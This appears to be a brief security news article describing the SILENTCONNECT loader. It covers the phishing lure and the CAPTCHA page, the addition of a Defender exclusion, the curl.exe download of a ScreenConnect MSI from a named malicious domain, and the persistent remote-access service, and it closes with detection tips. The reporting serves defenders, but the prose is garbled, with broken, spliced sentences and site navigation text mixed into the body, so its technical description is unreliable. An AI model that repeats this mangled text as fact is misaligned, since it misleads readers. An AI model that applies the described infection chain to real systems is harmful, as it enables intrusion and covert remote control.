SILENTCONNECT Uses VBScript, PowerShell and PEB Masquerading to Deploy ScreenConnect

SILENTCONNECT is a new type of multi-stage malware loader that has been quietly attacking Windows computers since at least March 2025 This article explores screenconnect lets attacker. . It installs the ConnectWise Screen by using VBScript, running PowerShell in memory, and pretending to be PEB.Connect the tool for remote monitoring and management to the victim's systems.

Find out more Tools for digital forensics Tools for ethical hacking Protecting Your Computer Once installed, ScreenConnect lets the attacker control the compromised machine's keyboard, which is a big problem for businesses all over the world. When someone gets a phishing email with a link that looks like it goes to a real invitation or proposal, that's when the infection starts. When the victim clicks it, they are sent to a Cloudflare Turnstile CAPTCHA page that asks them to prove they are human.

SILENTCONNECT adds an exception for Microsoft Defender (Source: Elastic) It then uses curl.exe to download the ScreenConnect MSI from bumptobabeco[. ]top, installs it with msiexec.exe, and sets it up as a Windows service that sends data to the attacker's server over TCP port 8041. Companies should regularly check their environments for unauthorized RMM installations and keep an eye on traffic going out to ScreenConnect server addresses that they don't know about.

Security teams should keep an eye out for PowerShell commands that combine Add-Type with remote downloads, VBScript files that are downloaded from the internet, and unexpected changes to Defender exclusions. Tracking calls to NtAllocateVirtualMemory from .NET processes can also help stop this threat before it gets too far. Set ZeroOwl as your preferred source in Google to get more instant updates on Facebook, LinkedIn, and X.